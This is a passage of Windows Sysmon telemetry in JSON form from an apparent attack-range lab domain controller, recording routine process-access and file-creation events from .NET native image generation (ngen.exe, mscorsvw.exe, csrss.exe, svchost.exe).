osoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.225\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.225","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.241\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-001087CC0E00}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.241","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-001087CC0E00}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.303\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-0010F9CF0E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.303","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-0010F9CF0E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-0010F9CF0E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-0010F9CF0E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:21.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227D-5F25-0000-0010F9CF0E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:21.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227D-5F25-0000-0010F9CF0E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:22.241\r\nProcessGuid: {41C8662E-227D-5F25-0000-0010F9CF0E00}\r\nProcessId: 2672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Data.Services.Client.dll\r\nCreationUtcTime: 2020-08-01 08:06:22.241","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:22.241","ProcessGuid":"{41C8662E-227D-5F25-0000-0010F9CF0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a70-0\\System.Data.Services.Client.dll","CreationUtcTime":"2020-08-01 08:06:22.241","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.288\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.288","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.288\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.288","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
